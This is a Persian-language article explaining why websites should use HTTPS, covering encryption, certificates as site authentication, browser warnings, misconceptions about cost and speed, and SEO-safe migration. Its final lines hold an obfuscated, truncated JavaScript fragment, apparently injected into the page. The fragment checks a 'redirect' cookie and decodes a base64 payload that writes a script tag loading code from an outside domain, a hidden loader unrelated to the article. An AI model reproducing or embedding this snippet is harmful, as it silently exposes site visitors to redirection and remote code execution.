Hypertext transfer protocol secure یا HTTPS نسخه امن پروتکل HTTP می باشد که وظیفه انتقال داده بین مرورگر و سرور را بر عهده دارد. HTTPS بواسطه رمزنگاری داده هایی که بین مرورگر و سرور جابجا می شود امنیت آنها را افزایش می دهد. این کار در زمانی که داده های حساس مثل اطلاعات حساب بانکی، اطلاعات حساب ایمیل یا اطلاعات سلامت در حال انتقال است از اهمیت ویژه ای برخوردار می باشد، مانند سایت هایی که از اطلاعات بانکی افراد استفاده می کنند مثل درگاه های پرداخت و درگاه های واسط. این سایت های پرداخت ملزم به استفاده از HTTPS هستند.
تفاوت بین HTTP و HTTPS چیست؟
HTTPS همان HTTP است با این تفاوت که رمزنگاری TLS بر روی آن اعمال شده است. HTTPS از TLS یا همان SSL برای رمزنگاری درخواست ها و پاسخ های HTTP استفاده می کند تا امنیت آنها را بالاتر ببرد.
سایت هایی که از HTTPS استفاده می کنند دامنه ی سایتشان با https:// شروع می شود مثل https://wikidemy.ir .
چرا ما باید از HTTPS استفاده کنیم؟
اولین دلیل: سایت هایی که از HTTPS استفاده می کنند، قابل اعتماد ترند.
سایتی که از HTTPS استفاده می کند مانند رستورانی است که تمام استاندارد های ایمنی و بهداشت را دارد. وقتی رستورانی این استانداردها را دارد مشتریان راحت تر می توانند به آنها اعتماد کنند، زیرا مطمئن هستند که از مواد غذایی سالم و تازه استفاده می کنند. حقیقتا امروزه، سایت هایی که هنوز از HTTP استفاده می کنند، مثل رستوران هایی هستند که فرسوده شده اند و از آزمون های بازرسی نتوانسته اند نمره قبولی بگیرند. پس اگر کسی از این رستوران ها غذا تهیه کند ریسک ناسالم بودن مواد غذایی را پذیرفته و شاید به بیماری مبتلا شود.
HTTPS از پروتکل SSL/TLS برای رمزنگاری ارتباطات استفاده می کند، بنابراین هکری نمی تواند این داده ها را هک کند و دیتای درون آن را مشاهده کند. SSL/TLS از جعل هویت نیز جلوگیری می کندو سپس بررسی می کند درخواستی که به سمت سرور آمده دقیقا از سمت شما است یا از شخص سوم . به این طریق از هک شدن و سرقت اطلاعات جلوگیری می شود(مثل رستورانی که استاندارد های بهداشت را دارد و شما به بیماری مبتلا نمی شوید)
با اینکه بعضی از کاربران مزایای TLS و SSL را نمی دانند ولی مرورگرهای امروزی به راحتی این موارد را تشخیص داده و اگر سایتی از نسخه https استفاده نکند، به کاربر هشدار مبنی بر عدم امنیت در این سایت را خواهد داد.
کروم و دیگر مرورگرها، سایت هایی که از HTTP استفاده می کنند را به عنوان “نا امن” می شناسند.
گوگل نیز در این سالها گام هایی برای ترغیب سایت ها به استفاده از HTTPS برداشته است. گوگل HTTPS را به فاکتورهای سئو اضافه کرد. هرچه وبسایت ایمن تر باشد، کاربر برای تصمیم گیری روی لینک هایی که گوگل پیشنهاد می دهد کمتر اشتباه می کند.
از جولای 2018 و بعد از آپدیت کروم به نسخه 68، کروم تمام سایت هایی که از HTTP استفاده می کردند را با نشانه گذاری به اسم “Not Secure” از دیگر سایت ها جدا می کرد. این هشدار برای همه ی سایت هایی که از SSL استفاده نمی کنند، نمایش داده می شود. دیگر کمپانی ها نیز از این روند پیروی کرده و این امکان را به مرورگرهایشان اضافه کردند.
دومین دلیل: سایت هایی که از HTTPS استفاده می کنند، امنیت بیشتری را برای کاربر و صاحبان سایت فراهم می کنند.
با HTTPS داده ها بصورت دو طرفه کدگذاری می شوند: یعنی مسیری که داده به سمت سرور اصلی می رود و همچنین مسیر برگشت که داده از سمت سرور اصلی به سمت کاربر هدایت می شود. در اینصورت هکرها دیگر نمی توانند در بین این مسیر داده ها را مشاهده کنند. در نتیجه وقتی شما نام کاربری یا رمز عبور خود را درون فرمی می نویسید و به سمت سرور ارسال می کنید هکرها نمی توانند آن را بدزدند. اگر وب سایت ها یا برنامه های وب مجبور هستند داده های حساس یا شخصی را برای کاربران ارسال کنند مثل اطلاعات حساب بانکی، رمزگذاری داده ها می تواند از آن داده ها به خوبی محافظت کنند.
سومین دلیل: HTTPS سایت ها را احراز هویت می کند.
کاربرانی که از اپلیکیشن های تاکسی آنلاین مثل اسنپ و تپسی استفاده می کنند مجبور نیستند صرف اینکه راننده به آنها می گوید از اسنپ و یا تپسی هستم، آن ها سوار آن ماشین شوند؛ چرا که نرم افزار، اطلاعاتی از راننده مثل تصویر و نام راننده، نوع ماشین و پلاک ماشین را به کاربر نمایش می دهد. کاربر می تواند با تطبیق اطلاعات نرم افزار و راننده و ماشین، ماشین درست را انتخاب کند و سوار شود حتی اگر آن ماشین را در تمام طول عمر خود ندیده باشد.
شبیه همین اتفاق برای کاربرانی می افتد که وارد یک وبسایت می شوند. در حقیقت آنها به کامپیوتری بسیار دور که نمی دانند کجا هست متصل می شوند، کامپیوتری که توسط یک فردی که آن کاربر تا الان او را ندیده است. گواهی SSL، که HTTPS را فعال می کند شبیه به اطلاعات راننده در نرم افزار تاکسی آنلاین است و اهراز هویت وب سرور را بواسطه ی انجام بعضی از کارهای خاص انجام می دهد. بدین واسطه دیگر کسی نمی تواند سایتی را شبیه سایتی دیگر جعل کند تا به آن طریق از کاربران کلاهبرداری کند.
احراز هویت بوسیله SSL امروزه در وبسایت اکثر شرکت های دنیا ظاهر می شود و بر اعتماد مردم به آن شرکت بسیار تأثیر گذار است.
تصورات اشتباه درباره ی HTTPS
خیلی از سایت ها برای سازگار شدن با https نیاز به زمان دارند. برای پیدا کردن منشأ این مشکل به تاریخ نگاهی می اندازیم.
وقتی HTTPS راه اندازی شد، راه اندازی اصولی آن سخت، آهسته و گران قیمت بود؛ یعنی اجرای درست آن سخت بود، سرعت درخواست های اینترنتی را کند می کرد و هزینه ها بواسطه دریافت گواهی خدمات افزایش پیدا می کرد. اما امروزه دیگر این موارد صحت ندارد. اما ترس هایی نیز هست که هنوز در دل صاحبان وبسایت وجود دارد و اجازه نمی دهد تا آنها برای راه اندازی https بر روی وبسایتشان تصمیم گیری کنند. اجازه دهید برخی از این تصورات اشتباه که باعث ترس می شود را به شما بگویم.
من که اطلاعاتی حساسی در سایتم ندارم، پس نیازی هم به https ندارم
یکی از دلایلی که صاحبان وبسایت علاقه ای به افزایش امنیت سایتشان ندارند این است که فکر می کنند که در این مرحله از کسب و کارشان پرداختن به تأمین امنیت، آنها را از هدفشان دور می کند. از اینها گذشته، اگر شما با داده های حساس سر و کار ندارید، پس این همه هک و از دست دادن اطلاعات چه معنایی دارد؟ در اینجا چند دلیل درباره ی امنیت وب به شما می گویم. بعضی از خدمات دهندگان اینترنتی تبلیغات خود را به اجبار به سایت هایی که بر پایه ی http هستند تزریق می کنند. این تبلیغات شاید درون متن ها نمایش داده شود و شاید هم در کنار سایت نمایش داده شود ولی حقیقت این است که مالک سایت از این تبلیغات هیچ سودی نمی برد. ولی اگر یکبار شما امنیت سایتتان را تأمین می کردید دیگر کسی نمی توانست به اجبار تبلیغاتش را به سایت شما تزریق کند.
مرورگرهای مدرن امروزی محدویت هایی را نسبت به سایت هایی که امن نیستند وضع کرده اند. درحال حاضر یکی از ویژگی هایی که کیفیت سایت را افزایش می دهد استفاده از HTTPS می باشد. تکنولوژی های جدید امروزی مثل مکان جغرافیایی کاربر، پوش نوتیفیکیشن نیز، نیاز دارند تا از نرم افزار های progressive web (PWAs) استفاده کنند که همگی نیازمند سطح بالایی از امنیت است. اینطور احساس می شود که داده هایی مثل مکان کاربر باید بسیار حساس باشد پس درنتیجه می توان از آن برای اهداف خرابکارانه نیز استفاده کرد.
من نمیخوام به عملکرد سایتم بواسطه ی افزایش زمان بارگذاری صفحات خللی وارد بشه
عملکرد سایت یکی از مهمترین فاکتورهای سئو برای گوگل و همچنین تجربه کاربری می باشد. افزایش زمان بارگذاری صفحات نیز قابل درک است. خوشبختانه، با گذشت زمان ، پیشرفت هایی در HTTPS اتفاق افتاده است تا از زمان مورد نیاز برای ایجاد یک اتصال رمزگذاری شده کاسته شود.
اما وقتی یک اتصال از نوع HTTP بین سرور و کاربر برقرار می شود به Connection های زیادی نیاز است تا درخواست از سوی کاربر به سمت سرور و از سرور به سمت کاربر هدایت شود. علاوه بر تاخیری که ارتباط TCP ایجاد می کند که در عکس با رنگ آبی مشخص شده است، یک ارتباط TLS/SSl (به اصلاح handshake) که در عکس به رنگ زرد مشخص شده نیز باید اتفاق بیفتد تا بتوان از HTTPS استفاده کرد.
می توان با راهکارهای به خصوصی این وقفه ایجاد شده بای ایجاد ارتباط با ssl را کاهش داد.
استفاده از HTTPS برای من گران تمام خواهد شد
ممکن است ادر ابتدا این موضوع درست به نظر برسد، اما الان هزینه این کار دیگر مطرح نیست. به دلیل اینکه شما با این کار یک لایه امن از انتقال اطلاعات تشکیل می دهید پس مشتریان شما بیشتر به شما اعتماد خواهند کرد. علاوه بر این، زمانی که از HTTPS برای سایتتان استفاد می کنید، گوگل و سایر موتورهای جستجو برای شما یک امتیاز مثبت در نظر می گیرند و در نهایت در سئو سایتتان تاثیر خوبی خواهد گذاشت.
هنگام تغییر سایتم به HTTPS، رتبه سایتم در موتورهای جستجو کاهش می یابد
به هنگام جابه جایی سایت ریسک هایی وجود دارد و اگر این کار به درستی صورت نگیرد، می تواند تاثیر منفی بر روی سئو داشته باشد. مشکلات احتمالی، عبارت است از خرابی وبسایت و down شدن آن، صفحات کراول (crawl) نشده و جریمه به خاطر محتواهای تکراری که ممکن است در دو یا چند صفحه از وبسایت شما وجود داشته باشد. به همین منظورف هنگام انتقال سایتتان به HTTPS دقت زیادی به خرج دهید یا از یک شخص متخصص بخواهید تا این کار را برای شما انجام دهد.
دو مورد از بهترین روش ها برای انتقال سایت به HTTPS عبارت است از:
- استفاده از ریدایرکت 301
با استفاده از ریدایرکت 301 بر روی سایت HTTP، برای اینکه به ورژن HTTPS آن اشاره کند، وب سایت شما به گوگل می گوید که تمامی صفحات سایت شما برای ایندکس شدن و نمایش در سرچ ها باید به جای جدید منتقل شوند.
- جابه جایی صحیح تگ های کنونیکال
با استفاده از تگ کنونیکال بر روی سایت های HTTPS، خزنده هایی مانند ربات گوگل (googlebot) می فهمند که از این به بعد باید صفحات امن را دنبال کنند.
اگر شما تعداد صفحات زیادی دارید و نگرانید که دوباره کراول شدن صفحاتتان زمان زیادی ببرد، با گوگل تماس بگیرید و به آنها بگویید که انتظار دارید چقدر ترافیک از طریق وبسایتتان ایجاد شود. سپس مهندسان شبکه سرعت خزیدن در سایت شما را افزایش می دهند تا با سرعت بیشتری صفحاتتان ایندکس شود.
{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
